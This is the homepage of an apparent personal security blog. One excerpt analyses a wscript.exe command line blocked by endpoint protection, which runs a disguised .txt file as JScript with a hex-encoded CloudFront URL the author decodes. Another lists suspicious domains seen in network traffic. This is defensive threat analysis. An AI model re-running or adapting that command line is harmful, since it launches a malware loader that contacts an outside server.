Home

Welcome to niem.es

Some musings on (mostly) security related topics.

Latest from the Blog

Examining strange wscript behavior

We use cylance with script control, and periodically I review the outliers that have been blocked. I came across this one recently: wscript.exe “C:ProgramData{18E0DD83-92A2-5745-1464-C9078E2642C9}domo.txt” “68747470733a2f2f643237346571343163333972326e2e636c6f756466726f6e742e6e6574” “//B” “//E:jscript” “–IsErIk” I took a copy of the domo.txt script and uploaded to VT: I also ran that hex string through a hex decoder: 68747470733a2f2f643237346571343163333972326e2e636c6f756466726f6e742e6e = https://d274eq41c39r2n.cloudfront.net According toContinue reading “Examining strange wscript behavior”

Update: f5d599a39d02caef1984e95fdc606f838893ffc5.xyz

Unfortunately, as of 16 April 2019, I’m still seeing traffic on this domain. Here are some others I’m seeing: dfbfb63dcaff96fbe9616fb806e4799f.com8d46980d994cc618aeed127df1b5c86d8acd86ce.info07bf396c25d9a624281c97752aee0247e4229b84.xyz07bf396c25d9a624281c97752aee0247e4229b84.com07bf396c25d9a624281c97752aee0247e4229b84.infod234304f57772cf6be78ab6c24a65c91ce896fff.xyzd234304f57772cf6be78ab6c24a65c91ce896fff.comd234304f57772cf6be78ab6c24a65c91ce896fff.info8d46980d994cc618aeed127df1b5c86d8acd86ce.xyzcbb0c7dae8061aca012b8a910062c33f3642e383.comcbb0c7dae8061aca012b8a910062c33f3642e383.xyzcbb0c7dae8061aca012b8a910062c33f3642e383.info

Get new content delivered directly to your inbox.